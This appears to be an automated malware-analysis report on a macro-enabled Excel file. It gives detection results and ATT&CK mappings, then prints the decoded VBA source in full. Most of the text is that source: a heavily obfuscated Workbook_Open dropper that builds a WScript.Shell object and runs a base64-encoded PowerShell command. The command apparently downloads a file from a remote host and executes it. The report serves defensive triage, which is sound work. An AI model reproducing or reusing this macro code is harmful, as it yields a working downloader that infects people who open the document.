MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an Office document containing VBA macros, specifically a Workbook_Open macro, which is a common technique for initial execution. Heuristics indicate the use of WScript.Shell and CreateObject, suggesting the VBA code attempts to run external commands or download additional content. The VBA code is heavily obfuscated, making it difficult to determine the exact payload, but the presence of these indicators strongly suggests a downloader or dropper functionality.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6338232-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6338232-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
End If kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO = "WSCript.shell" If False Then -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC = CreateObject(kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO) If False Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() -
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14776 bytes |
SHA-256: dfdbc9d4fa0ca86d8129325187cf174617084546a957f66dd5979b47284b3690 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
146 of 175 identifiers look randomly generated (e.g. 'AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSA') — consistent with name-mangling obfuscation. Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
zSTckmgCPIvHcuU.abUkRcqd
If False Then
Dim PKYPkDKPkpdmbjsNPqLLSDpqzvfuXfsYPPDbtLsk
ElseIf False Then
Dim evFKaFTJWkmFbPVLViPoXPsFwFWMfRUD
End If
If False Then
Dim xahWyfQtcVYntmwAtsGLwDMPDANViHdEPi
ElseIf False Then
Dim HAiyNqSVMBrFMKIVSnLIHuORTxRuLVsTXKfwSufQtarLXyoDNNoqtG
End If
If False Then
Dim aNmQfPYXKrJYhBeMDXIvPhDDuUJOhxgCZQkSJC
ElseIf False Then
Dim OPrVPAByQnYBKQhyrtKjVLGKqMKHyRRMCA
End If
If False Then
Dim JtDuSCBvEWpgnQUbZqIZgDIhfCpuAyWLyJHouwbHiaGkUKZtmXsaEdTFkW
ElseIf False Then
Dim PPNHvFzdheIfhcPArGwYMVdwHcGwHVpBEXhLuaeBkrcvkHqQKDlNILK
End If
If False Then
Dim tmQATzDWLoHaKuEGQcvnVsiLzmpmDjcttMnYdaL
ElseIf False Then
Dim CgUQGdggVFwVkNXpBEFAgJRScLOhxGfdpQtGAbbhSGUgGOsfV
End If
If False Then
Dim WmUXaesPCouPziOZTfTUQpZcYhapkLNTiMaULGPmArymhRTXFGnjYKEhMry
ElseIf False Then
Dim sDDeqbahnHuOMQhTZqnvHODjeYevXHtITHWiw
End If
If False Then
Dim NILGkgPLsaSqqfqZwreAUARxfJgOmvFuyXMiboWinYlxLEgbCjWQrhc
ElseIf False Then
Dim MqObaABZwVYsTTHxHUwNvOUlacELCYpCRuzrMNwimzobnMNIulPvvU
End If
If False Then
Dim hxWdAyvpWYgVaZTPluYOawasyOPvQRJtHwNBVjMymwdQvRlnoeAVXgtkXe
ElseIf False Then
Dim fmiAYEOnNdMRuBhacdTJwgcbHlRoWbDceqEaPmYYBIEHbWkynwEPROiyK
End If
If False Then
Dim GsmnaQmajnDxHLpFuHocUAkBSAZWnKQIFPItllbrRhrigBglOKXGtWqGI
ElseIf False Then
Dim lUZqQnZXvrrCwTJgwKnIBVQToHdnJPiZBlAQBAAu
End If
If False Then
Dim SKlKpiSqNZwLDxGPDFCIKlNgIRALStevKspqkGeFpmakSWWEekMw
ElseIf False Then
Dim yskhwEBXiGYUuABKIPfxbwTXLdOmvwgihi
End If
If False Then
Dim xRIIufFGXiOFpRUMvOEPUBYMWTqPclZqnMDjBz
ElseIf False Then
Dim VArUZlJFoxRjASdRNvtwmaoqelIYSdN
End If
If False Then
Dim lKwtEXAbnCRftxskHMVyHqFNuLApoclmKjgYEYZuNTFtUvvslAAL
ElseIf False Then
Dim xfFuFiysWKnKQeUKRUginbknkLszQIDnbapfdlTWagXCg
End If
If False Then
Dim vdqblaRURXWuSKupzbOHAjqpoggBKIHDh
ElseIf False Then
Dim HphCXfhmTJDSlLbYgaEIvfLnAnEuQKJQSMKUMncwhVhZmWCVEcdhCvlbduB
End If
If False Then
Dim kamVJAmAYAGMtyHbaymAekjpngbNXbiq
ElseIf False Then
Dim RlrWuzYZzVeUxQkjuTLdruXzrwhcZZdxSQuHGlgbaNAIGOsXwr
End If
If False Then
Dim TDPFzXNrexRvzasgChVccImjCetPtcEJghFZhMQWuOGjJeNaPZ
ElseIf False Then
Dim MKCTPKQfCUexyCtHPSUSzpQyiNBDaYQTAUPtHMRvJBKwswQEpBPuFxaX
End If
If False Then
Dim uDlBINFeDLxdnzACAZJxeUGlwxNYIVNCuszDbQmvvgsgyn
ElseIf False Then
Dim RpBNugncsZwzFLzhVhxuiuAwbkmNBxcanIgXXvbhPSzaG
End If
If False Then
Dim bKbvOLKiDEWpElKtZauwWMwebJZGPfQvapzZLRmmSrkEJiSJRopr
ElseIf False Then
Dim EdkPOwUFlDTXobPPlkiHoIefbsUtrQpbqZqxFkLOxhBOYMPi
End If
If False Then
Dim SDXhGhCwyEnVcaOUOrhPkSJBYTKGGPHPclansHVIWuyAwpmWTgAge
ElseIf False Then
Dim AyAtWImXwpixXtqAacGWYspTJEihnnaPbkbnZtWyi
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "zSTckmgCPIvHcuU"
Public Sub abUkRcqd()
YwudsOnbRJzUF.lSacnoLqzErutPxBvnbn
If False Then
Dim laFPDZwvVsEtJGIJgkRaEjIPTWnRDagFHomSkEFf
ElseIf False Then
Dim llRuVWReTdtIEYdCRpwhlfsvLzlVTp
End If
If False Then
Dim YcfmoTRNtxEIxZhXAjKkAuIYtFsWiWkvLeEQdSkKlEvycdiTNoyCLi
ElseIf False Then
Dim peUGsiaueXMIxTUQthyzzwyJvQXZJuY
End If
If False Then
Dim hkcoawXaBkqZYmUfPzwuQDMjsfKLcLBlkzeYUet
ElseIf False Then
Dim TWHxOJXaXbkHaMAHeYtwvlMyqjEoZHv
End If
If False Then
Dim LlFcXJGxaVFnjrDaZjrAAaiyiKJGfEiAPfYWUjdyYaTapxcGnIeFhGvkDG
ElseIf False Then
Dim uMzzRVmEXESgGqGtcZHHIkiCTWZcTJjoTNoQyYIynlZXnGCozoeWdvyKe
End If
If False Then
Dim wfvvKlOUeMsCpuDQJTXKKOMUldeeNLXPdl
ElseIf False Then
Dim BsNCdzLDJtKmJtbGUbbAUhTaJgGkHTocYDsK
End If
If False Then
Dim CGqXzGFSKzTlCHrwodRUZmtxtavqEhOGARDNlDBNc
ElseIf False Then
Dim AQKNVhAcsnumYkPMtdYLONckNklDdKkcDrZWijXs
End If
If False Then
Dim vOMtTTcgnAsZcCNmnZzkwwyhDSigLteJFgQABjRtIEPcSKA
ElseIf False Then
Dim BemiJknvyPeqBlvVuWjTvmNlEIGcrgWPsRhCYKUYSkRkXsPINiVFj
End If
End Sub
Attribute VB_Name = "YwudsOnbRJzUF"
Sub lSacnoLqzErutPxBvnbn()
On Error Resume Next
If False Then
Dim UlmxxUFYDHDlCHrlDgZweGBkxhReXzLPEKEMBhEglkU
ElseIf False Then
Dim EQRcqgpcARwoNjBzPDaBDvogrCfjVcsL
End If
If False Then
Dim ulwUfEbxhXKxHWrczhpdKiRJclknAFGYZlubmhTKcdT
ElseIf False Then
Dim gkqYVLDkomOALUnruUowbQmYWcPpRNeBhPkYmMObxVSmK
End If
qEPRBeBeLDRtOyjEtxjCKBLUcNLsxOJLQgBNRlWfTuHgArIufEUllDZptvpnTIgwuGcixWmHa = 0
If False Then
Dim kiGzpYqogrPyRCtvOSaHNSwkOFiFMzGyAOlt
ElseIf False Then
Dim JqcooNBXUaUJUgjCsewSmWkjqkbhlRy
End If
If False Then
Dim DQAmYqlTARYPolYkgPDGVRTHnFsyDlUlDcRtUtLMHKwANG
ElseIf False Then
Dim vyRAvRiKcmxsySymPOxnMMTfPmEqzLUSuhJthDqCDtzevbusOUvhD
End If
Dim EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC
If False Then
Dim atjelkINrKRReyRIEFMYvjTMpkorLcfPmPTnaOvShoMiiNR
ElseIf False Then
Dim cckJPiJHqaWpBwQCOfBfOfeiqJurGWkebSLObSP
End If
If False Then
Dim hdIcMDYtVQmxCghCxyBTFoSBTpsNilCbvQUBGCRfRQZaTZixtQNQZzKsLG
ElseIf False Then
Dim JXLKLkOLBmMgwvgWBpPriuGuTSXlBwFbq
End If
kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO = "WSCript.shell"
If False Then
Dim ztuTGFoMIXwlNTSjDyUdTYOQQqsMcJFgkpwCmCukafZXKIGzEByxlyWbeeC
ElseIf False Then
Dim QMcjyRPBYWQxADkDoyrFHksHbLIvlS
End If
If False Then
Dim VXIzeXyvbFvHhcoDxuAvicnYufTUImJUPFBspAZMEsXlKACQSXNNu
ElseIf False Then
Dim qksjjFyDdnowasbavNxVoqpFCOucDBlYvaYVJJGvaIbFiokH
End If
Set EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC = CreateObject(kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO)
If False Then
Dim bqXJQsFAumhVKWAbCPAzTGRmHBvfOjXNdnBMebIDUYaWbllDIADSnknUZkB
ElseIf False Then
Dim OxalKPTrXVnwaHxfvfuKWQrXOgFatzgnuatFunQHItOiUDdKpEsp
End If
If False Then
Dim eZfyGCXeJtxXozBzOslHPmCcCIDKCukpHrJVvvzrQlxOwquUBdw
ElseIf False Then
Dim xTkZsXCvxzMbPJIQwqgETsurdongLOiIZxmWWRQy
End If
qtT = ""
If False Then
Dim szCrDKiFoaydVYdEYswDjWkjREBRWmteZ
ElseIf False Then
Dim iMUqDoSGhslQEnAUhxeVNOWPSZzIQjCgT
End If
If False Then
Dim EmMJOVEdxBdyTMQAxooPIMUpFXdoKpyqFwABoKT
ElseIf False Then
Dim cZsQMsQzNiHTuNRKsRWEqrPTHDnsWMP
End If
qtT = qtT & "YwBtAGQAIAAmACAALwBLACAAQwBEACAAQwA6ACAAJgAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAGQAQQBCAHkAQQBIAGsAQQBlAHcAQgByAEEARwBrAEEAYgBBAEIAcwBBAEMAQQBBAEwAUQBCAHcAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEcANABBAFkAUQBCAHQAQQBHAFUAQQBJAEEAQgBGAEEARgBnAEEAUQB3AEIARgBBAEUAdwBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEARgBNAEEAZQBRAEIAegBBAEgAUQBBAFoAUQBCAHQAQQBDADQAQQBUAGcAQgBsAEEASABRAEEATABnAEIAWABBAEcAVQBBAFkAZwBCAEQAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAcABBAEMANABBAFIAQQBCAHYAQQBIAGMAQQBiAGcAQgBzAEEARwA4AEEAWQBRAEIAawBBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBLAE"
If False Then
Dim MmVMpQwHxoYQFCWEcomHjSGckKYIJFXdAT
ElseIf False Then
Dim vgYBbtwKZQSbJRlyKEkEftgsbfrnxsQuPmGqfbMsL
End If
If False Then
Dim ZtpKIAHWLuTswnCzgZwBIMhAXMXKvSjrssGAriTekQmx
ElseIf False Then
Dim wBTyEqzBQqDMMpmwcwbsKbADhBIxGRR
End If
qtT = qtT & "EAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAE8AZwBBAHYAQQBDADgAQQBhAFEAQQB1AEEARwBNAEEAZABRAEIAaQBBAEcAVQBBAGQAUQBCAHcAQQBHAHcAQQBiAHcAQgBoAEEARwBRAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBFAFkAQQBaAHcAQQA0AEEARwBvAEEAYgBBAEIAQwBBAEMANABBAGEAZwBCAHcAQQBHAGMAQQBKAHcAQQBzAEEARgBzAEEAUgBRAEIAdQBBAEgAWQBBAGEAUQBCAHkAQQBHADgAQQBiAGcAQgB0AEEARwBVAEEAYgBnAEIAMABBAEYAMABBAE8AZwBBADYAQQBFAGMAQQBaAFEAQgAwAEEARQBZAEEAYgB3AEIAcwBBAEcAUQBBAFoAUQBCAHkAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASwBBAEEAbgBBAEUAMABBAGUAUQBCAEUAQQBHADgAQQBZAHcAQgAxAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAGMAdwBBAG4AQQBDAGsAQQBLAHcAQQBuAEEARgB3AEEAYQBRAEIAMABBAEcAYwBBAFoAZwBCADAAQQBDADQAQQBaAFEAQgA0AEEARwBV"
If False Then
Dim rZjDVsZGESibBptoBvWCnpunVAQQCiBvzYMncmQDDpWZ
ElseIf False Then
Dim bAzOnNGCjOeBfvhUcJEVRnbccGLPeTzxSULVBBcoczLkuKHh
End If
If False Then
Dim EvatlBIoZWlgCrXPPgjLjMTagPtRbqiSzeKisFMRLXvfQvmkbv
ElseIf False Then
Dim VNbvxsczNVIqNinShXhoXKURzMQnKkdIqfVUrDgRFsrqJVKNrxOO
End If
qtT = qtT & "AEEASgB3AEEAcABBAEQAcwBBAEsAQQBCAE8AQQBHAFUAQQBkAHcAQQB0AEEARQA4AEEAWQBnAEIAcQBBAEcAVQBBAFkAdwBCADAAQQBDAEEAQQBMAFEAQgBqAEEARwA4AEEAYgBRAEEAZwBBAEYATQBBAGEAQQBCAGwAQQBHAHcAQQBiAEEAQQB1AEEARQBFAEEAYwBBAEIAdwBBAEcAdwBBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAcABBAEMANABBAFUAdwBCAG8AQQBHAFUAQQBiAEEAQgBzAEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAFUAQQBLAEEAQgBiAEEARQBVAEEAYgBnAEIAMgBBAEcAawBBAGMAZwBCAHYAQQBHADQAQQBiAFEAQgBsAEEARwA0AEEAZABBAEIAZABBAEQAbwBBAE8AZwBCAEgAQQBHAFUAQQBkAEEAQgBHAEEARwA4AEEAYgBBAEIAawBBAEcAVQBBAGMAZwBCAFEAQQBHAEUAQQBkAEEAQgBvAEEAQwBnAEEASgB3AEIATgBBAEgAawBBAFIAQQBCAHYAQQBHAE0AQQBkAFEAQgB0AEEARwBVAEEAYgBnAEIAMA"
If False Then
Dim DmYKtJwkbopdszAhNTberPieTdIdCDwMVOEDGKbhHwqRDNyJVcAYW
ElseIf False Then
Dim kXoDurPASiYscIdvwaCrtWvZRaFfzIZDYq
End If
If False Then
Dim lrQzMSLhoNRYaFUNYBxgcNcOlTlkBJIVUmWmexOjgMihHtA
ElseIf False Then
Dim AKlkXFrNYPBNsgbfeFwEniijbnNzPeuGsTlZPZkPcZyXdjVCFhDcLoM
End If
qtT = qtT & "BBAEgATQBBAEoAdwBBAHAAQQBDAHMAQQBKAHcAQgBjAEEARwBrAEEAZABBAEIAbgBBAEcAWQBBAGQAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASwBRAEEANwBBAEgAMABBAFkAdwBCAGgAQQBIAFEAQQBZAHcAQgBvAEEAQwBBAEEAZQB3AEIAOQBBAEEAPQA9AA=="
If False Then
Dim RcCJksrxtUuUYvBPFUhcOjKGsRKuibSvEHTxNQAWkbF
ElseIf False Then
Dim DiOwHDRyIeMxhRwQSixORCzQRbDBpTKsneHXdUCqRdJRsJlf
End If
If False Then
Dim RzhonMnAixfgAPIoTUKDJYnyfGxosh
ElseIf False Then
Dim YIpXkpmVFaqGpfpWqCUVxXyiWtMiJgPzIAZWqcfS
End If
If False Then
Dim BxPjNDiHJIQvTWkAJHBqdDMYLqyoGSgNXBTzIPVSKFZAQTflQZNja
ElseIf False Then
Dim opylqXWFuAqcCYRCkrumigYdLIsLMXhFwniMVOSryNPEjYOvNighS
End If
If False Then
Dim xsHQUZifLsXTlfPpFhVZDnVQUunuwxdqzmz
ElseIf False Then
Dim vbwBojLnVslyszFIBLIPJWrwZmoiOPgTyfUOJfgprzAXiwuvrobfrWpYk
End If
EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC.Run jiannfNEANPCyftFxeZxofBBqJYLTCfyYbfh(qtT), qEPRBeBeLDRtOyjEtxjCKBLUcNLsxOJLQgBNRlWfTuHgArIufEUllDZptvpnTIgwuGcixWmHa
If False Then
Dim zcCvcZFMSzNerzWeSYKWTNcrtrZnAbbpveJCduPauLQxh
ElseIf False Then
Dim QzpEAZyfBQlAKCkzRLqXXiNpTAXIjcIxfKdskiABdJuN
End If
If False Then
Dim YCTseaczZZJhmzkzBpwYIoUzYsPiLpuNozRRhf
ElseIf False Then
Dim dJzJXFBwFlyAznNWFjhTTmKtnkfvsmhTRWLmYy
End If
End Sub
Function jiannfNEANPCyftFxeZxofBBqJYLTCfyYbfh(sgEgPnUKVPopPVSVvWDlQXcDqfsFezvQXIwEGIARCqLwWtoiuetfNYCVEBqjvPfWUYRGYOOmWljaMfgwrJK)
If False Then
Dim QPycmekLpGzRuhjOMryFVnZFDSDeidbbxGTSUqzgJcuZwb
ElseIf False Then
Dim szjDJUnSdcpsZTaGcMeYUnORtVrRws
End If
If False Then
Dim tAJcaEufTHnedqcbRgGCzhuXGFkSJocVWkjpjxtVLxsXkpKXpSEL
ElseIf False Then
Dim LttLGlVVTcVffRIsHnsTmkrCpXmRuMdrkRKcrXjxcYBjbNs
End If
AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSAwNJUEOvQXDiUJzelzFbJdSckYZkjeYWcIgNSFlEMuMlUlZhmZuQztIXelYwfdLlygGLdlMfNA = "Microsoft.XMLDOM"
If False Then
Dim ThRQBZkYaCqWiyDaGyeuNGfBjDurOjHabfTkcwbR
ElseIf False Then
Dim AskZABAzYxukwTeMBQgxfsJrvQuDfTxKXNuVWFAhDvSRoWdIAHiLPdlHis
End If
If False Then
Dim ekGwUEzkNjYIpvQyukZsCYmmCXklutb
ElseIf False Then
Dim nndbQbHaOREItjsRnvQjBhqpGxUtwUNpTIlVLUzX
End If
Dim EdCIOqiAvNpFObXNDVcdoBgrwiqkgoQaJhxMctGpXmqtkQmcuWzZAbZCxLMgAyTGwOwgdLkKOm
If False Then
Dim nJLayPsCKGxqeKZGwnUSGNeuDOplyWFTvsvsVPrqFSipWXKIifYXz
ElseIf False Then
Dim hRZeRXkaHDoAdulPhkhwdNoeoXfDgCTyhUOaWNDrGQ
End If
If False Then
Dim yOuotdYtBuqbVUduqurgtEjqTJfKsThppNPZjzeCe
ElseIf False Then
Dim mBZHGyuxbXIAaXteEVjxOAhNAlIFEKqQpBGCKiMLlNRwYpPqVufduEQ
End If
Dim GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT
If False Then
Dim lTMGVqotQgsLZQrUWJYMAjkpLVSkJfMVkkUiycrVxUBQfd
ElseIf False Then
Dim qZeZJUWsQCjWuzYEjkTWaovIWtSCPgiUJifsGjWrzsUS
End If
If False Then
Dim zbhrxskQwJCCdWDPCTdjUONMTfyzNbXiTdIuMaF
ElseIf False Then
Dim WvRYzfdOjgHpfPlykOUXRtlCUmUiANJCcNGnCqNhqQOTGmrShfXgsCocKP
End If
Set EdCIOqiAvNpFObXNDVcdoBgrwiqkgoQaJhxMctGpXmqtkQmcuWzZAbZCxLMgAyTGwOwgdLkKOm = CreateObject(AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSAwNJUEOvQXDiUJzelzFbJdSckYZkjeYWcIgNSFlEMuMlUlZhmZuQztIXelYwfdLlygGLdlMfNA)
If False Then
Dim DNLuOWWENRIxvtAnhBfSwhuBBUpdKZZddnnzWvBswBZaJkje
ElseIf False Then
Dim fEUnxsSVTJttgtunsfTIGARmznVuIUrQkLx
End If
If False Then
Dim FEmglURgMBHLCHlieQbXeninKWYNyRdJVwojFyh
ElseIf False Then
Dim npUEkrbSnXmMzInSRWyWPwDiuYyqGSCcgjoiKjxwiDkqMEdAheXMGcS
End If
Set GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT = EdCIOqiAvNpFObXNDVcdoBgrwiqkgoQaJhxMctGpXmqtkQmcuWzZAbZCxLMgAyTGwOwgdLkKOm.createElement("OPRgHzyryKkHXiAJighpZ")
If False Then
Dim rllKLslMVVKgQUFHiYCoLLNVpvyIcvpVEQxwYZlDwr
ElseIf False Then
Dim PVCYNfbWonEoHfYPUQucjZfoczXIiJmyrTwsTRhSgFGBQQJRYIEUJTIppN
End If
If False Then
Dim vNHTofBGwnjfwCjbwdTeYMqFjZERoXLGCGV
ElseIf False Then
Dim ULNRbAJTVitMCliXeWLpjXBjObjSZcccphOQiMsd
End If
GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT.DataType = "bin.base" & "64"
If False Then
Dim OsUXqMCfFzhkrRmwJeDARqutFQXUWSpReiaqDesBYDMZvslYuSGD
ElseIf False Then
Dim IrLXybRaphInKPFJqwsemBbOdVxNfzaELlImWDrc
End If
If False Then
Dim MRMruZOfmchyZbRHQxtddEvpHEcZGTnnEQSUpkUEGRaCRb
ElseIf False Then
Dim ejTBVYJNzIWWkpxpZTpuuJJxRgdpXLdsYfZsFExO
End If
GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT.Text = sgEgPnUKVPopPVSVvWDlQXcDqfsFezvQXIwEGIARCqLwWtoiuetfNYCVEBqjvPfWUYRGYOOmWljaMfgwrJK
If False Then
Dim eqRJxSzeGRsHNXhVZWjpvTqneexEPEkUVaQErAzygyiGSWeByESiUISKz
ElseIf False Then
Dim deTUvPBgXmnHdeZXkIxlkVIzwGLmBzMHFEOVgdligZ
End If
If False Then
Dim vkrtVatKjzVZPIVTXoEPfXZfBYPDrHXOELZYIDlksqPNmg
ElseIf False Then
Dim pFzMFxeRtXKLswKqTccHUDixKUCTXoHLtUjKDeBajnRBNwKpa
End If
jiannfNEANPCyftFxeZxofBBqJYLTCfyYbfh = GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT.NodeTypedValue
If False Then
Dim CWmlfMlWCCluLtFQzSXMAmpbCXhmgkNJN
ElseIf False Then
Dim sVRUaNIxnBbPfYtLlOencaPhLiHezpSobgT
End If
If False Then
Dim YnvYEPOMkOLWznavVjWkRFkJrGdyxjnozEVXqqZXNNeSz
ElseIf False Then
Dim MIrYuwEEvBSDmgylQPBaXWuRCFfKzXEaRKfxlaCmikD
End If
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 46592 bytes |
SHA-256: 64e2d8f6b331880c2e84fb67c88d170dc70b48d97fd29da0c05a6abf355b5414 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
813 of 1063 identifiers look randomly generated (e.g. 'AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSA') — consistent with name-mangling obfuscation. Carved artifact contains 4 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.